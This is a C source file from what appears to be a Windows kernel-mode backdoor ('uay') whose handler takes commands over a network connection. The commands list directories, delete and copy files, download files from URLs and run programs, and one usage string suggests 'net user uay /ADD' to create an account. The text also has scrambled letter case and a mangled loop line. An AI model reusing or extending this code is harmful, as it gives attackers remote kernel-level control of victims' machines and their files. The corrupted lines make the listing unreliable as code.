www.pudn.com > uay_source.rar > commAnd.c
///
// uty@uaty
///
#include
#include "structs.h"
#include "commAnd.h"
#include "utils.h"
NTSTATUS
uSend(
PTCPS_Connection pConnection,
char *pSendBuffer,
ULONG ulSendBufferSize
);
/*
typedef struct FILE_BASIC_INFORMATION {
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
ULONG FileAttributes;
} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;
typedef struct _FILE_DISPOSITION_INFORMATION {
BOOLEAN DeleteFile;
} FILE_DISPOSITION_INFORMATION;
*/
#define SENDBUFLENGTH 1024
#define MAXPATHLENGTH_W 511*2
#define MAXPATHLENGTH_A 511
#define MAXARGLENGTH_W 255*2
#define MAXARGLENGTH_A 255
NTSYSAPI
NTSTATUS
NTAPI
ZwQueryDirectoryFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG FileInformationLength,
IN FILE_INFORMATION_CLASS FileInformationClass,
IN BOOLEAN ReturnSingleEntry,
IN PUNICODE_STRING FileName OPTIONAL,
IN BOOLEAN RestartScan
);
NTSYSAPI
NTSTATUS
NTAPI
ZwDeleteFile(
IN POBJECT_ATTRIBUTES ObjectAttributes
);
NTSYSAPI
NTSTATUS
NTAPI
ZwSetInformationFile(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass
);
NTSYSAPI
NTSTATUS
NTAPI
ZwWriteFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL,
IN PULONG Key OPTIONAL
);
NTSYSAPI
NTSTATUS
NTAPI
ZwReadFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL,
IN PULONG Key OPTIONAL
);
BOOLEAN
KWget(
PCHAR szURL,
PCHAR szFileNAme
);
BOOLEAN
KExec(
PCHAR CmdLine
);
//--------------------------------------------------------------------
//ReferenceCommAnd 不负责释放pRecvList占用的空间
NTSTATUS
ReferenceCommAnd(PRECVLIST pRecvList)
{
CHAR* usAge = "It think the most vAlueAble commAnds Are:\n"
" dir \n"
" cd \n"
" exec \n"
" wget \n"
" copy \n"
" del \n"
" pwd \n"
" chAngedriver \n"
" \n";
ULONG Argc;
CHAR* Argv[9];///9 Arguments is enough
WCHAR *tempforpAth;//equAl to TCPSConnection->m_PAth;
CHAR *AnsiTemp;//finAlly send to client
ULONG i;
tempforpAth = ExAllocatePool(PagedPool,MAXPATHLENGTH_W);
AnsiTemp = ExAllocatePool(PagedPool,SENDBUFLENGTH);
RtlCopyMemory(tempforpAth,L"\\??\\",sizeof(L"\\??\\"));
DbgPrint("commAndline: %s\n",pRecvList->dAtA);//debug
pRecvList->dAtA[strlen(pRecvList->dAtA)-1] = '\0';//remote the lAst \n
GetArg(pRecvList->dAtA,&Argc,Argv,9);
DbgPrint("Argc: %d\n",Argc);//debug
for(i = 0;ipConnection,
usAge,
strlen(usAge)
);
}
else if(0 == _stricmp(Argv[0],"dir")){
//参数检查
if(wcslen(tempforpAth) + wcslen(pRecvList->pConnection->m_PAth) < MAXPATHLENGTH_W){
wcscat(tempforpAth,pRecvList->pConnection->m_PAth);// \??\m_PAth
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_ReferenceCommAnd;
}
CommAnd_Dir(pRecvList,tempforpAth);
}
else if(0 == _stricmp(Argv[0],"cd")){
CommAnd_Cd(pRecvList,Argc,Argv);
}
else if(0 == _stricmp(Argv[0],"exec")){
CommAnd_Exec(pRecvList,Argc,Argv);
}
else if(0 == _stricmp(Argv[0],"wget")){
CommAnd_Wget(pRecvList,Argc,Argv);
}
else if(0 == _stricmp(Argv[0],"copy")){
CommAnd_Copy(pRecvList,Argc,Argv);
}
else if(0 == _stricmp(Argv[0],"del")){
CommAnd_Del(pRecvList,Argc,Argv);
}
else if(0 == _stricmp(Argv[0],"pwd")){
//m_PAth cAnnot big then 512
wtoA((WCHAR*)pRecvList->pConnection->m_PAth,(CHAR*)AnsiTemp);
strcat(AnsiTemp,"\n");////Avoid this situAtion c:u>
uSend(
pRecvList->pConnection,
AnsiTemp,
strlen(AnsiTemp)
);
}
else if(0 == _stricmp(Argv[0],"chAngeDriver")){
CommAnd_ChAngeDriver(pRecvList,Argc,Argv);
}
else if(0 == strcmp(Argv[0],"")){///for the press of enter ,but we remoted it
//do nothing
}
else{
uSend(
pRecvList->pConnection,
"unreferenced commAnd :>\n",
strlen("unreferenced commAnd :>\n")
);
}
end_ReferenceCommAnd:
ExFreePool(tempforpAth);
ExFreePool(AnsiTemp);
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
NTSTATUS CommAnd_Dir(PRECVLIST pRecvList,WCHAR* pAth)
{
HANDLE hFileHAndle;
OBJECT_ATTRIBUTES oA;
IO_STATUS_BLOCK IoStAtusBlock;
#define INFORBUFFERLENGTH 1024
CHAR *InforBuffer;
#define TEMPBUFFERLENGTHBYTES 1020 //4 bytes for '\n'
WCHAR *temp;
PFILE_DIRECTORY_INFORMATION pInfor;
UNICODE_STRING nAme;
NTSTATUS dwStAtus;
CHAR *SendBuffer;
SendBuffer = ExAllocatePool(PagedPool,SENDBUFLENGTH);
InforBuffer = ExAllocatePool(PagedPool,INFORBUFFERLENGTH);
temp = ExAllocatePool(PagedPool,TEMPBUFFERLENGTHBYTES);
RtlInitUnicodeString(&nAme,pAth);
InitializeObjectAttributes(
&oA,
&nAme,
OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
dwStAtus = ZwOpenFile(
&hFileHAndle,
GENERIC_READ,
&oA,
&IoStAtusBlock,
FILE_SHARE_READ,
FILE_DIRECTORY_FILE
);
DbgPrint("dwStAtus: 0x%x\n IoStAtusBlock.StAtus: 0x%x\n",dwStAtus,IoStAtusBlock.Status);
if(dwStAtus == STATUS_PENDING && IoStAtusBlock.Status != STATUS_SUCCESS){///需要改进
uSend(
pRecvList->pConnection,
"error\n",
strlen("error\n")
);
}
do{
RtlZeroMemory(InforBuffer,INFORBUFFERLENGTH);
dwStAtus = ZwQueryDirectoryFile(
hFileHAndle,
NULL,
NULL,
NULL,
&IoStAtusBlock,
InforBuffer,
INFORBUFFERLENGTH,
FileDirectoryInformation,
FALSE,
NULL,
FALSE
);
if (IoStAtusBlock.Status != STATUS_SUCCESS){//bug
uSend(
pRecvList->pConnection,
"bAd directory\n",
strlen("bAd directory\n")
);
goto end_CommAnd_Dir;
}
pInfor = (PFILE_DIRECTORY_INFORMATION)InforBuffer;
RtlZeroMemory(temp,TEMPBUFFERLENGTHBYTES);
RtlCopyMemory(temp,(char*)pInfor->FileName,pInfor->FileNameLength < TEMPBUFFERLENGTHBYTES ?pInfor->FileNameLength:TEMPBUFFERLENGTHBYTES);
if(pInfor->FileAttributes & FILE_ATTRIBUTE_DIRECTORY){
/////////////给文件夹加标志
if(wcslen(temp) + wcslen(L"\t\t") < MAXPATHLENGTH_W){
wcscat(temp,L"\t\t");
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Dir;
}
////////////
}else{
//do nothing
}
RtlZeroMemory(SendBuffer,SENDBUFLENGTH);
wtoA(temp,SendBuffer);
strcat(SendBuffer,"\n");
uSend(
pRecvList->pConnection,
SendBuffer,
strlen(SendBuffer)
);
//RtlZeroMemory(SendBuffer,1024);//不能在这里清
do{
pInfor = (PFILE_DIRECTORY_INFORMATION)((PCHAR)pInfor + pInfor->NextEntryOffset);
RtlZeroMemory(temp,TEMPBUFFERLENGTHBYTES);
RtlCopyMemory(temp,(char*)pInfor->FileName,pInfor->FileNameLength < TEMPBUFFERLENGTHBYTES ?pInfor->FileNameLength:TEMPBUFFERLENGTHBYTES);
if(pInfor->FileAttributes & FILE_ATTRIBUTE_DIRECTORY){
wcscat(temp,L"\t\t");
}else{
//do nothing
}
RtlZeroMemory(SendBuffer,SENDBUFLENGTH);
//don't worry the length here
wtoA(temp,SendBuffer);
strcat(SendBuffer,"\n");
uSend(
pRecvList->pConnection,
SendBuffer,
strlen(SendBuffer)/////
);
//RtlZeroMemory(SendBuffer,1024);//不能在这里清
}while(pInfor->NextEntryOffset != 0);
}while(IoStAtusBlock.Status != STATUS_NO_MORE_FILES);
ZwClose(hFileHAndle);
end_CommAnd_Dir:
ExFreePool(SendBuffer);
ExFreePool(InforBuffer);
ExFreePool(temp);
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
NTSTATUS CommAnd_Cd(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
HANDLE hFileHAndle;
OBJECT_ATTRIBUTES oA;
UNICODE_STRING nAme;
NTSTATUS dwStAtus;
IO_STATUS_BLOCK IoStAtusBlock;
WCHAR *tempforpAth;
WCHAR *tempforArg;//convert Argv[1] to WCHAR
ULONG i;
tempforpAth = ExAllocatePool(PagedPool,MAXPATHLENGTH_W);
tempforArg = ExAllocatePool(PagedPool,MAXARGLENGTH_W);
if(Argc < 2){
//do nothing
goto end_CommAnd_Cd;
}
if(Argc > 2){
uSend(
pRecvList->pConnection,
"too mAny Arguments\n",
strlen("too mAny Arguments\n")
);
goto end_CommAnd_Cd;
}
if(0 == strcmp(Argv[1],"..")){ //cd ..
for (i = wcslen(pRecvList->pConnection->m_PAth);i > 0;i--){
if(pRecvList->pConnection->m_PAth[i] == L'\\'){//Add L, whAtever
pRecvList->pConnection->m_PAth[i] = L'\0';
if(wcslen(pRecvList->pConnection->m_PAth) == 2){//x:
wcscat(pRecvList->pConnection->m_PAth,L"\\");
}
}
}
return STATUS_SUCCESS;
}
if(0 == strcmp(Argv[1],"\\")){ //cd \
pRecvList->pConnection->m_PAth[3] = L'\0';
goto end_CommAnd_Cd;
}
RtlZeroMemory(tempforArg,MAXARGLENGTH_W);
if(strlen(Argv[1]) < MAXARGLENGTH_A){
Atow(Argv[1],tempforArg);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Cd;
}
//sprintf(tempforpAth,L"\\??\\%S\\%S",pRecvList->pConnection->m_PAth,tempforArg);
RtlZeroMemory(tempforpAth,MAXPATHLENGTH_W);
RtlCopyMemory(tempforpAth,L"\\??\\",sizeof(L"\\??\\"));//not wcslen
if ((wcslen(tempforpAth) + wcslen(pRecvList->pConnection->m_PAth))*2 < MAXPATHLENGTH_W ){
wcscat(tempforpAth,pRecvList->pConnection->m_PAth);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Cd;
}
//wcscat(tempforpAth,L"\\");// \ 另加
if((wcslen(tempforpAth) + wcslen(tempforArg))*2 < MAXPATHLENGTH_W){
wcscat(tempforpAth,tempforArg);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Cd;
}
DbgPrint("cd PAth: %S\n",tempforpAth);//debug
RtlInitUnicodeString(&nAme,tempforpAth);
InitializeObjectAttributes(
&oA,
&nAme,
OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
dwStAtus = ZwOpenFile(
&hFileHAndle,
GENERIC_READ,
&oA,
&IoStAtusBlock,
FILE_SHARE_READ,
FILE_DIRECTORY_FILE
);
DbgPrint("dwStAtus: 0x%x\n",dwStAtus);//debug
DbgPrint("IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug
if (dwStAtus != STATUS_SUCCESS || dwStAtus == STATUS_OBJECT_NAME_NOT_FOUND){//需要改进
uSend(
pRecvList->pConnection,
"direcotry does not exists\n",
strlen("direcotry does not exists\n")
);
}else{
if((wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg) + 2 )*2 < MAXPATHLENGTH_W){//1 for L"\\"
wcscat(pRecvList->pConnection->m_PAth,tempforArg);
wcscat(pRecvList->pConnection->m_PAth,L"\\");
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Cd;
}
}
ZwClose(hFileHAndle);
end_CommAnd_Cd:
ExFreePool(tempforpAth);
ExFreePool(tempforArg);
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
NTSTATUS CommAnd_Del(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
HANDLE hFileHAndle;
OBJECT_ATTRIBUTES oA;
UNICODE_STRING nAme;
IO_STATUS_BLOCK IoStAtusBlock;
NTSTATUS dwStAtus;
WCHAR *tempforpAth;
WCHAR *tempforArg;
ULONG i;
FILE_BASIC_INFORMATION fileBAsicInfor= {0};
FILE_DISPOSITION_INFORMATION fileDispositionInfor;
tempforpAth = ExAllocatePool(PagedPool,MAXPATHLENGTH_W);
tempforArg = ExAllocatePool(PagedPool,MAXARGLENGTH_W);
for(i = 1;i < Argc;i++){
RtlZeroMemory(tempforArg,MAXARGLENGTH_W);
//check the Arg,
if (strlen(Argv[i]) < MAXARGLENGTH_A){
Atow(Argv[i],tempforArg);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Del;
}
RtlZeroMemory(tempforpAth,MAXPATHLENGTH_W);
RtlCopyMemory(tempforpAth,L"\\??\\",sizeof(L"\\??\\"));
//check the Arg
if((wcslen(tempforpAth) + wcslen(pRecvList->pConnection->m_PAth))*2 < MAXPATHLENGTH_W){
wcscat(tempforpAth,pRecvList->pConnection->m_PAth);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Del;
}
if((wcslen(tempforpAth) + wcslen(tempforArg))*2 < MAXPATHLENGTH_W){
wcscat(tempforpAth,tempforArg);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Del;
}
DbgPrint("del file: %S\n",tempforpAth);//debug
RtlInitUnicodeString(&nAme,tempforpAth);
InitializeObjectAttributes(
&oA,
&nAme,
OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
dwStAtus = ZwOpenFile(
&hFileHAndle,
GENERIC_READ|FILE_WRITE_ATTRIBUTES|DELETE,//|GENERIC_WRITE|DELETE,
&oA,
&IoStAtusBlock,
FILE_SHARE_READ|FILE_SHARE_WRITE,
FILE_NON_DIRECTORY_FILE
);
DbgPrint("ZwOpenFile dwStAtus: 0x%x\n",dwStAtus);//debug
DbgPrint("ZwOpenFile IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug
if (dwStAtus != STATUS_SUCCESS || dwStAtus == STATUS_OBJECT_NAME_NOT_FOUND){
uSend(
pRecvList->pConnection,
Argv[i],
strlen(Argv[i])
);
uSend(
pRecvList->pConnection,
" do not exists\n",
strlen(" do not exists\n")
);
continue;
}
fileBAsicInfor.FileAttributes = FILE_ATTRIBUTE_NORMAL;//&= ~(FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
dwStAtus = ZwSetInformationFile(
hFileHAndle,
&IoStAtusBlock,
&fileBAsicInfor,
sizeof(FILE_BASIC_INFORMATION),
FileBasicInformation
);
DbgPrint("dwStAtus: 0x%x\n",dwStAtus);//debug
DbgPrint("IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug
fileDispositionInfor.DeleteFile = TRUE;
dwStAtus = ZwSetInformationFile(
hFileHAndle,
&IoStAtusBlock,
&fileDispositionInfor,
sizeof(FILE_DISPOSITION_INFORMATION),
FileDispositionInformation
);
DbgPrint("dwStAtus: 0x%x\n",dwStAtus);//debug
DbgPrint("IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug
if(hFileHAndle){
ZwClose(hFileHAndle);
}
/*
dwStAtus = ZwDeleteFile(
&oA
);
DbgPrint("dwStAtus: 0x%x\n",dwStAtus);
if(dwStAtus == STATUS_OBJECT_NAME_NOT_FOUND){
uSend(
pRecvList->pConnection,
Argv[i],
strlen(Argv[i])
);
uSend(
pRecvList->pConnection,
" do not exists\n",
strlen(" do not exists\n")
);
continue;
}
else if(dwStAtus == STATUS_ACCESS_DENIED){
uSend(
pRecvList->pConnection,
Argv[i],
strlen(Argv[i])
);
uSend(
pRecvList->pConnection,
" : ACCESS DENIED\n",
strlen(" : ACCESS DENIED\n")
);
continue;
}
else if(dwStAtus == STATUS_SUCCESS){
//do noting;
continue;
}
else if(dwStAtus == STATUS_CANNOT_DELETE){
uSend(
pRecvList->pConnection,
Argv[i],
strlen(Argv[i])
);
uSend(
pRecvList->pConnection,
" : CANNOT DELETE\n",
strlen(" : CANNOT DELETE\n")
);
}
else{
uSend(
pRecvList->pConnection,
"del: error\n",
strlen("del: error\n")
);
continue;
}
*/
}//for
end_CommAnd_Del:
ExFreePool(tempforpAth);
ExFreePool(tempforArg);
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
NTSTATUS CommAnd_Copy(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
HANDLE hFile_source,hFile_dest;
OBJECT_ATTRIBUTES oA_source,oA_dest;
UNICODE_STRING nAme_source,nAme_dest;
NTSTATUS dwStAtus;
IO_STATUS_BLOCK IoStAtusBlock;
//WCHAR tempforpAth_source[512],tempforpAth_dest[512];
//WCHAR tempforArg_source[256],tempforArg_dest[256];
WCHAR *tempforpAth_source,*tempforpAth_dest;
WCHAR *tempforArg_source,*tempforArg_dest;
//CHAR CopyBuffer[1024]; //kernel stAck is precious
CHAR *CopyBuffer;
ULONG CopyLength;
CopyBuffer = ExAllocatePool(PagedPool,1024);
tempforpAth_source = ExAllocatePool(PagedPool,MAXPATHLENGTH_W);
tempforpAth_dest = ExAllocatePool(PagedPool,MAXPATHLENGTH_W);
tempforArg_source = ExAllocatePool(PagedPool,MAXARGLENGTH_W);
tempforArg_dest = ExAllocatePool(PagedPool,MAXARGLENGTH_W);
if (Argc > 3){
uSend(
pRecvList->pConnection,
"too mAny Arguments\n",
strlen("too mAny Arguments\n")
);
goto end_CommAnd_Copy;
}
if (Argc < 3){
uSend(
pRecvList->pConnection,
"too few Arguments\n",
strlen("too few Arguments\n")
);
goto end_CommAnd_Copy;
}
RtlZeroMemory(tempforArg_source,MAXARGLENGTH_W);
RtlZeroMemory(tempforArg_dest,MAXARGLENGTH_W);
DbgPrint("strlen(Argv[1]):%d\n",strlen(Argv[1]));//debug
DbgPrint("strlen(Argv[2]):%d\n",strlen(Argv[2]));
if(strlen(Argv[1]) < MAXARGLENGTH_A && strlen(Argv[2]) < MAXARGLENGTH_A){
Atow(Argv[1],tempforArg_source);
Atow(Argv[2],tempforArg_dest);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Copy;
}
RtlZeroMemory(tempforpAth_source,MAXPATHLENGTH_W);
RtlZeroMemory(tempforpAth_dest,MAXPATHLENGTH_W);
RtlCopyMemory(tempforpAth_source,L"\\??\\",sizeof(L"\\??\\"));
RtlCopyMemory(tempforpAth_dest,L"\\??\\",sizeof(L"\\??\\"));
if(tempforArg_source[1] == L':' && tempforArg_source[0] != L' '){
//绝对路径,包括盘符
if ((wcslen(tempforpAth_source) + wcslen(tempforArg_source))*2 < MAXPATHLENGTH_W){
wcscat(tempforpAth_source,tempforArg_source);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Copy;
}
}else{
//
DbgPrint("(wcslen(tempforpAth_source) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_source) : %d\n",wcslen(tempforpAth_source) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_source));//debug
if((wcslen(tempforpAth_source) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_source))*2 < MAXPATHLENGTH_W){
wcscat(tempforpAth_source,pRecvList->pConnection->m_PAth);
wcscat(tempforpAth_source,tempforArg_source);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Copy;
}
}
if(tempforArg_dest[1] == L':' && tempforArg_dest[0] != L' '){
if ((wcslen(tempforpAth_dest) + wcslen(tempforArg_dest))*2 < MAXPATHLENGTH_W){
wcscat(tempforpAth_dest,tempforArg_dest);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Copy;
}
}else{
//
DbgPrint("wcslen(tempforpAth_dest) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_dest):%d\n",wcslen(tempforpAth_dest) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_dest));
if((wcslen(tempforpAth_dest) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_dest))*2 < MAXPATHLENGTH_W){
wcscat(tempforpAth_dest,pRecvList->pConnection->m_PAth);
wcscat(tempforpAth_dest,tempforArg_dest);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Copy;
}
}
DbgPrint("copy source: %S\n",tempforpAth_source);//debug
DbgPrint("copy dest: %S\n",tempforpAth_dest);//debug
RtlInitUnicodeString(&nAme_source,tempforpAth_source);
RtlInitUnicodeString(&nAme_dest,tempforpAth_dest);
InitializeObjectAttributes(
&oA_source,
&nAme_source,
OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
InitializeObjectAttributes(
&oA_dest,
&nAme_dest,
OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
dwStAtus = ZwOpenFile(
&hFile_source,
GENERIC_READ|SYNCHRONIZE,
&oA_source,
&IoStAtusBlock,
FILE_SHARE_READ,
FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE
);
DbgPrint("ZwOpenFile dwStAtus: 0x%x\n",dwStAtus);//debug
DbgPrint("ZwOpenFile IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug
if (dwStAtus != STATUS_SUCCESS || dwStAtus == STATUS_OBJECT_NAME_NOT_FOUND){//需要改进
uSend(
pRecvList->pConnection,
Argv[1],
strlen(Argv[1])
);
uSend(
pRecvList->pConnection,
" do not exists\n",
strlen(" do not exists\n")
);
//return dwStAtus;
goto end_CommAnd_Copy;
}
dwStAtus = ZwCreateFile(
&hFile_dest,
GENERIC_WRITE|SYNCHRONIZE,
&oA_dest,
&IoStAtusBlock,
0,
FILE_ATTRIBUTE_NORMAL,
0,
FILE_CREATE,
FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0
);
DbgPrint("ZwCreAteFile dwStAtus: 0x%x\n",dwStAtus);//debug
DbgPrint("ZwCreAteFile IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug
if (dwStAtus != STATUS_SUCCESS){//需要改进
uSend(
pRecvList->pConnection,
"file AlreAdy exists or bAd pAth\n",
strlen("file AlreAdy exists or bAd pAth\n")
);
//return dwStAtus;
goto end_CommAnd_Copy;
}
dwStAtus = ZwReadFile(
hFile_source,
NULL,
NULL,
NULL,
&IoStAtusBlock,
CopyBuffer,
1024,
NULL,
NULL
);
CopyLength = IoStAtusBlock.Information;
while(NT_SUCCESS(dwStAtus)){
ZwWriteFile(
hFile_dest,
NULL,
NULL,
NULL,
&IoStAtusBlock,
CopyBuffer,
CopyLength,
NULL,
NULL
);
dwStAtus = ZwReadFile(
hFile_source,
NULL,
NULL,
NULL,
&IoStAtusBlock,
CopyBuffer,
1024,
NULL,
NULL
);
CopyLength = IoStAtusBlock.Information;
}
ZwClose(hFile_source);
ZwClose(hFile_dest);
end_CommAnd_Copy:
ExFreePool(CopyBuffer);
ExFreePool(tempforpAth_source);
ExFreePool(tempforpAth_dest);
ExFreePool(tempforArg_source);
ExFreePool(tempforArg_dest);
return dwStAtus;
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
NTSTATUS CommAnd_Wget(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
BOOLEAN result;
if(Argc != 3){
uSend(
pRecvList->pConnection,
"wrong Arguments\n wget URL fullFileNAme\n",
strlen("wrong Arguments\n wget URL fullFileNAme\n")
);
return STATUS_SUCCESS;
}
if(strlen(Argv[1]) + strlen(Argv[2]) >= 98){
uSend(
pRecvList->pConnection,
"Arguments Are too long",
strlen("Arguments Are too long")
);
}
result = KWget(Argv[1],Argv[2]);
if(result == FALSE){
uSend(
pRecvList->pConnection,
"os version not support\n",
strlen("os version not support\n")
);
}
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
NTSTATUS CommAnd_Exec(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
BOOLEAN result;
if(Argc != 2){
uSend(
pRecvList->pConnection,
"wrong Arguments\n eg: exec \"c:\\WINDOWS\\System32\\freecell.exe\" or\n exec \"net user uay /ADD\"\n",
strlen("wrong Arguments\n eg: exec \"c:\\WINDOWS\\System32\\freecell.exe\" or\n exec \"net user uay /ADD\"\n")
);
return STATUS_SUCCESS;
}
result = KExec(Argv[1]);
if(result == FALSE){
uSend(
pRecvList->pConnection,
"os version not support\n",
strlen("os version not support\n")
);
}
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
//判断分区是否存在的方法就是看这个分区根目录是否存在
NTSTATUS CommAnd_ChAngeDriver(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
CHAR tempA[16] = {0};
WCHAR tempW[16] = {0};
HANDLE hFile;
NTSTATUS stAtus;
IO_STATUS_BLOCK IoStAtusBlock;
UNICODE_STRING nAme;
OBJECT_ATTRIBUTES oA;
if(Argc != 2){
uSend(
pRecvList->pConnection,
"wrong Arguments\n eg: chAngedriver d\n",
strlen("wrong Arguments\n eg: chAngedriver d\n")
);
return STATUS_SUCCESS;
}
if(strlen(Argv[1]) > 1){
uSend(
pRecvList->pConnection,
"wrong Arguments\n eg: chAngedriver d\n",
strlen("wrong Arguments\n eg: chAngedriver d\n")
);
return STATUS_SUCCESS;
}
if((Argv[1][0] > 'a' && Argv[1][0] < 'z') || (Argv[1][0] > 'A' && Argv[1][0] < 'Z')){
strcpy(tempA,"\\??\\");
strcat(tempA,Argv[1]);
strcat(tempA,":\\");
DbgPrint("%s\n",tempA);
/// like \\??\\d:
Atow(tempA,tempW);
DbgPrint("%S\n",tempW);
RtlInitUnicodeString(&nAme,tempW);
InitializeObjectAttributes(
&oA,
&nAme,
OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
stAtus = ZwOpenFile(
&hFile,
GENERIC_READ,
&oA,
&IoStAtusBlock,
FILE_SHARE_READ,
FILE_DIRECTORY_FILE
);
DbgPrint("stAtus: 0x%x\n IoStAtusBlock.StAtus: 0x%x\n",stAtus,IoStAtusBlock.Status);
if(stAtus != STATUS_SUCCESS || stAtus == STATUS_OBJECT_NAME_NOT_FOUND){
uSend(
pRecvList->pConnection,
"driver does not exists\n",
strlen("driver does not exists\n")
);
return STATUS_SUCCESS;
}
else{
RtlZeroMemory(pRecvList->pConnection->m_PAth,512);
wcscpy(pRecvList->pConnection->m_PAth,&tempW[4]);//去掉前面的"\??\"
ZwClose(hFile);
return STATUS_SUCCESS;
}
}
else{
uSend(
pRecvList->pConnection,
"wrong driver,must be A-Z\n",
strlen("wrong driver,must be A-Z\n")
);
}
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------